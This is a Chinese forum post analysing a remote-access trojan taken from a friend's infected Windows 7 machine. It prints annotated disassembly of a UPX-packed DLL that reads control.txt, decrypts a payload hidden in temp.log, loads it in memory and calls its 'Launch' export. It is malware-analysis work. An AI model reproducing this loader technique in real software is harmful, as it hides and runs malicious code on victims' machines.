[原创]记一次远控木马的分析
发表于: 2018-2-8 23:48 7297
朋友电脑中毒, 样本是从他的电脑里拷出来的...
环境: win7 x32
工具: OD IDA DLL Export Viewer LordPE
control.txt 里放了一段疑似 Base64 编码后的文本
尝试解码后
解码前: N1hZMG9NTjhvVHwyMDk5MjA= 解码后: 7XY0oMN8oT|209920
temp.log 里则是乱码, 肯定是被加密了
help.exe 好像是 VS 的资源编辑器
rcdll.dll 加了 UPX 壳, 这里用 ESP 定律直接脱掉
看下它的两个导出函数
; Exported Handler: an empty stub that returns immediately (followed by alignment nops); all real work is in the RC export.
100012E0 RCDLL.Handler $ C3 retn
100012E1 90 nop
100012E2 90 nop
100012E3 90 nop
; Exported RC: the DLL's real entry point.
; Flow as shown by the listing:
;   1. build "<dir of host exe>\control.txt" and read it into a heap buffer;
;   2. use the raw file content as a mutex name -> single-instance guard (exit if it already exists);
;   3. Base64-decode the same content, split it at "|", copy the first token to global 0x1000AB00;
;   4. build "<dir of host exe>\temp.log", read it, hand it to the decrypt routine at 10001000;
;   5. load the decrypted blob as a DLL (100014B0), resolve its export "Launch" (10001960) and call it;
;   6. park the thread in an endless Sleep loop so the host process stays alive.
; ebx is zeroed once and used as NULL/FALSE/0 throughout.
100010C0 RCDLL.RC /$ 81EC 14030000 sub esp,0x314
100010C6 |. 53 push ebx
100010C7 |. 55 push ebp
100010C8 |. 56 push esi
100010C9 |. 57 push edi
100010CA |. 33DB xor ebx,ebx ; ebx = 0 for the rest of the function
100010CC |. B9 40000000 mov ecx,0x40
100010D1 |. 33C0 xor eax,eax
100010D3 |. 8D7C24 19 lea edi,dword ptr ss:[esp+0x19]
100010D7 |. 885C24 18 mov byte ptr ss:[esp+0x18],bl ; first byte + 0x40 dwords + word + byte = 260-byte path buffer zeroed
100010DB |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
100010E0 |. F3:AB rep stos dword ptr es:[edi] ; |
100010E2 |. 66:AB stos word ptr es:[edi] ; |
100010E4 |. AA stos byte ptr es:[edi] ; |
100010E5 |. 8D4424 1C lea eax,dword ptr ss:[esp+0x1C] ; |
100010E9 |. 50 push eax ; |PathBuffer
100010EA |. 53 push ebx ; |hModule => NULL
100010EB |. FF15 30700010 call dword ptr ds:[0x10007030] ; \GetModuleFileNameA ; hModule NULL -> path of the host process exe, not of this DLL
100010F1 |. 8D4C24 18 lea ecx,dword ptr ss:[esp+0x18]
100010F5 |. 51 push ecx ; /Path
100010F6 |. FF15 00710010 call dword ptr ds:[0x10007100] ; \PathRemoveFileSpecA ; strip the exe name, keep its directory
100010FC |. 8D5424 18 lea edx,dword ptr ss:[esp+0x18]
10001100 |. 68 48800010 push 10008048 ; /StringToAdd = "\control.txt"
10001105 |. 52 push edx ; |ConcatString
10001106 |. FF15 2C700010 call dword ptr ds:[0x1000702C] ; \lstrcatA ; -> "<exe dir>\control.txt"
1000110C |. 53 push ebx ; /hTemplateFile => NULL
1000110D |. 68 80000000 push 0x80 ; |Attributes = NORMAL
10001112 |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING
10001114 |. 53 push ebx ; |pSecurity => NULL
10001115 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
10001117 |. 8D4424 2C lea eax,dword ptr ss:[esp+0x2C] ; |
1000111B |. 68 00000080 push 0x80000000 ; |Access = GENERIC_READ
10001120 |. 50 push eax ; |FileName
10001121 |. FF15 28700010 call dword ptr ds:[0x10007028] ; \CreateFileA ; NOTE: the returned handle is not checked against INVALID_HANDLE_VALUE
10001127 |. 8BF8 mov edi,eax ; edi = hFile (control.txt)
10001129 |. 53 push ebx ; /pFileSizeHigh => NULL
1000112A |. 57 push edi ; |hFile
1000112B |. 895C24 18 mov dword ptr ss:[esp+0x18],ebx ; | ; zero the local later passed as pBytesRead
1000112F |. FF15 24700010 call dword ptr ds:[0x10007024] ; \GetFileSize
10001135 |. 8BE8 mov ebp,eax ; ebp = file size
10001137 |. 55 push ebp
10001138 |. E8 070A0000 call 10001B44 ; one cdecl arg (size) -> buffer pointer; presumably a malloc-style allocator -- TODO confirm
1000113D |. 83C4 04 add esp,0x4
10001140 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
10001144 |. 8BF0 mov esi,eax ; esi = buffer for control.txt
10001146 |. 53 push ebx ; /pOverlapped
10001147 |. 51 push ecx ; |pBytesRead
10001148 |. 55 push ebp ; |BytesToRead
10001149 |. 56 push esi ; |Buffer
1000114A |. 57 push edi ; |hFile
1000114B |. FF15 20700010 call dword ptr ds:[0x10007020] ; \ReadFile
10001151 |. 8B2D 1C700010 mov ebp,dword ptr ds:[0x1000701C] ; kernel32.CloseHandle ; ebp now caches CloseHandle, reused at 10001173 and 10001265
10001157 |. 57 push edi ; /hObject
10001158 |. FFD5 call ebp ; \CloseHandle
1000115A |. 56 push esi ; /MutexName ; the raw file content is used verbatim as the mutex name (NUL termination depends on the allocator/file -- confirm)
1000115B |. 53 push ebx ; |InitialOwner
1000115C |. 53 push ebx ; |pSecurity
1000115D |. FF15 18700010 call dword ptr ds:[0x10007018] ; \CreateMutexA
10001163 |. 8BF8 mov edi,eax ; edi = hMutex
10001165 |. FF15 14700010 call dword ptr ds:[0x10007014] ; [GetLastError
1000116B |. 3D B7000000 cmp eax,0xB7 ; 0xB7 = ERROR_ALREADY_EXISTS: another instance already holds the mutex
10001170 |. 75 0A jnz short 1000117C
10001172 |. 57 push edi ; /hObject
10001173 |. FFD5 call ebp ; \CloseHandle
10001175 |. 53 push ebx ; /ExitCode
10001176 |. FF15 10700010 call dword ptr ds:[0x10007010] ; \ExitProcess ; single-instance guard: terminate the whole host process
1000117C |> B9 40000000 mov ecx,0x40
10001181 |. 33C0 xor eax,eax
10001183 |. 8DBC24 210200>lea edi,dword ptr ss:[esp+0x221]
1000118A |. 889C24 200200>mov byte ptr ss:[esp+0x220],bl ; zero a second 260-byte buffer for the decoded text
10001191 |. F3:AB rep stos dword ptr es:[edi]
10001193 |. 66:AB stos word ptr es:[edi]
10001195 |. AA stos byte ptr es:[edi]
10001196 |. 8B4424 10 mov eax,dword ptr ss:[esp+0x10] ; eax = bytes read from control.txt
1000119A |. 8D9424 200200>lea edx,dword ptr ss:[esp+0x220]
100011A1 |. 52 push edx ; output buffer
100011A2 |. 50 push eax ; input length
100011A3 |. 56 push esi ; input (control.txt content)
100011A4 |. E8 67010000 call 10001310 ; Base64 decode (author's label): "N1hZMG9NTjhvVHwyMDk5MjA=" -> "7XY0oMN8oT|209920"
100011A9 |. 8D8C24 2C0200>lea ecx,dword ptr ss:[esp+0x22C] ; same decoded buffer (esp moved by the three pushes above)
100011B0 |. 68 44800010 push 10008044 ; UNICODE "|" ; delimiter
100011B5 |. 51 push ecx
100011B6 |. E8 E5080000 call 10001AA0 ; split at "|"; returns the first token -- presumably strtok-like, confirm
100011BB |. 83C4 14 add esp,0x14 ; clean up the 3 + 2 cdecl args of both calls
100011BE |. 50 push eax ; /String2
100011BF |. 68 00AB0010 push 1000AB00 ; |String1 = RCDLL.1000AB00
100011C4 |. FF15 0C700010 call dword ptr ds:[0x1000700C] ; \lstrcpyA ; global 0x1000AB00 = "7XY0oMN8oT"
100011CA |. B9 40000000 mov ecx,0x40
100011CF |. 33C0 xor eax,eax
100011D1 |. 8DBC24 1D0100>lea edi,dword ptr ss:[esp+0x11D]
100011D8 |. 889C24 1C0100>mov byte ptr ss:[esp+0x11C],bl ; zero a third 260-byte path buffer
100011DF |. F3:AB rep stos dword ptr es:[edi]
100011E1 |. 66:AB stos word ptr es:[edi]
100011E3 |. 8D9424 1C0100>lea edx,dword ptr ss:[esp+0x11C]
100011EA |. 68 04010000 push 0x104 ; /BufSize = 104 (260.)
100011EF |. 52 push edx ; |PathBuffer
100011F0 |. 53 push ebx ; |hModule
100011F1 |. AA stos byte ptr es:[edi] ; |
100011F2 |. FF15 30700010 call dword ptr ds:[0x10007030] ; \GetModuleFileNameA ; again the host exe path (hModule NULL)
100011F8 |. 8D8424 1C0100>lea eax,dword ptr ss:[esp+0x11C]
100011FF |. 50 push eax ; /Path
10001200 |. FF15 00710010 call dword ptr ds:[0x10007100] ; \PathRemoveFileSpecA
10001206 |. 8D8C24 1C0100>lea ecx,dword ptr ss:[esp+0x11C]
1000120D |. 68 38800010 push 10008038 ; /StringToAdd = "\temp.log"
10001212 |. 51 push ecx ; |ConcatString
10001213 |. FF15 2C700010 call dword ptr ds:[0x1000702C] ; \lstrcatA ; -> "<exe dir>\temp.log"
10001219 |. 53 push ebx ; /hTemplateFile
1000121A |. 68 80000000 push 0x80 ; |Attributes = NORMAL
1000121F |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING
10001221 |. 53 push ebx ; |pSecurity
10001222 |. 6A 01 push 0x1 ; |ShareMode = FILE_SHARE_READ
10001224 |. 8D9424 300100>lea edx,dword ptr ss:[esp+0x130] ; |
1000122B |. 68 00000080 push 0x80000000 ; |Access = GENERIC_READ
10001230 |. 52 push edx ; |FileName
10001231 |. FF15 28700010 call dword ptr ds:[0x10007028] ; \CreateFileA ; again no INVALID_HANDLE_VALUE check
10001237 |. 8BF0 mov esi,eax ; esi = hFile (temp.log)
10001239 |. 53 push ebx ; /pFileSizeHigh
1000123A |. 56 push esi ; |hFile
1000123B |. FF15 24700010 call dword ptr ds:[0x10007024] ; \GetFileSize
10001241 |. 8BF8 mov edi,eax ; edi = file size
10001243 |. 895C24 14 mov dword ptr ss:[esp+0x14],ebx ; zero the bytes-read local
10001247 |. 57 push edi
10001248 |. E8 F7080000 call 10001B44 ; same allocator as at 10001138
1000124D |. 83C4 04 add esp,0x4
10001250 |. 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14]
10001254 |. A3 08AC0010 mov dword ptr ds:[0x1000AC08],eax ; global 0x1000AC08 = pointer to the temp.log buffer
10001259 |. 53 push ebx ; /pOverlapped
1000125A |. 51 push ecx ; |pBytesRead
1000125B |. 57 push edi ; |BytesToRead
1000125C |. 50 push eax ; |Buffer
1000125D |. 56 push esi ; |hFile
1000125E |. FF15 20700010 call dword ptr ds:[0x10007020] ; \ReadFile
10001264 |. 56 push esi
10001265 |. FFD5 call ebp ; CloseHandle(hFile)
10001267 |. 8B5424 14 mov edx,dword ptr ss:[esp+0x14]
1000126B |. 52 push edx ; size = bytes actually read from temp.log
1000126C |. 68 08AC0010 push 1000AC08 ; &buffer pointer: the global is passed by address, not the buffer itself
10001271 |. E8 8AFDFFFF call 10001000 ; decrypt call (author's label); the pointer is reloaded below, so the routine may replace the buffer -- confirm
10001276 |. A1 08AC0010 mov eax,dword ptr ds:[0x1000AC08] ; eax = decrypted payload
1000127B |. 50 push eax
1000127C |. E8 2F020000 call 100014B0 ; load DLL from memory (author's label); returns 0 on failure (see the je below)
10001281 |. 83C4 0C add esp,0xC ; 2 + 1 cdecl args of the two calls above
10001284 |. 3BC3 cmp eax,ebx
10001286 |. A3 F8AA0010 mov dword ptr ds:[0x1000AAF8],eax ; global 0x1000AAF8 = module handle of the loaded payload
1000128B |. 74 3D je short 100012CA ; load failed -> epilogue
1000128D |. 68 30800010 push 10008030 ; ASCII "Launch"
10001292 |. 50 push eax
10001293 |. E8 C8060000 call 10001960 ; GetProcAddress-like: resolve the payload's export "Launch" (author's label)
10001298 |. 83C4 08 add esp,0x8
1000129B |. 3BC3 cmp eax,ebx
1000129D |. 74 19 je short 100012B8 ; "Launch" not found
1000129F |. 68 30800010 push 10008030 ; ASCII "Launch"
100012A4 |. FFD0 call eax ; call Launch; the "Launch" string pointer is its single argument
100012A6 |. 8B35 08700010 mov esi,dword ptr ds:[0x10007008] ; kernel32.Sleep
100012AC |. 83C4 04 add esp,0x4
100012AF |> 68 A0860100 /push 0x186A0 ; 100000 ms
100012B4 |. FFD6 |call esi ; Sleep
100012B6 |.^ EB F7 \jmp short 100012AF ; endless loop: RC never returns once Launch has run, keeping the host process alive
100012B8 |> A1 F8AA0010 mov eax,dword ptr ds:[0x1000AAF8]
100012BD |. 3BC3 cmp eax,ebx
100012BF |. 74 09 je short 100012CA
100012C1 |. 50 push eax
100012C2 |. E8 E9010000 call 100014B0 ; called again with the module handle when Launch is missing -- looks like an unload/cleanup path, confirm
100012C7 |. 83C4 04 add esp,0x4
100012CA |> 5F pop edi
100012CB |. 5E pop esi
100012CC |. 5D pop ebp
100012CD |. 5B pop ebx
100012CE |. 81C4 14030000 add esp,0x314
100012D4 \. C3 retn
直接定位关键点
(1) 读入宿主进程 exe 所在目录下的 control.txt (GetModuleFileNameA 的 hModule 传的是 NULL, 取的是进程主模块的路径)
(2) 用读取的内容 N1hZMG9NTjhvVHwyMDk5MjA= 作为名字创建互斥体, 如果 GetLastError 返回 0xB7 (ERROR_ALREADY_EXISTS, 说明已经有一个实例在跑), 则结束进程
(3) 将 N1hZMG9NTjhvVHwyMDk5MjA= 进行 Base64 解码, 解码的结果与刚开始猜测的一样
(4) 把解码后的内容 7XY0oMN8oT|209920 以 "|" 进行分割, 并将 7XY0oMN8oT 用 lstrcpyA 拷贝到 0x1000AB00
(5) 读入同一目录下的 temp.log 并解密 (10001000), 解密后的数据被当作 DLL 加载 (100014B0), 然后取其导出函数 Launch 并调用, 之后进入 Sleep 死循环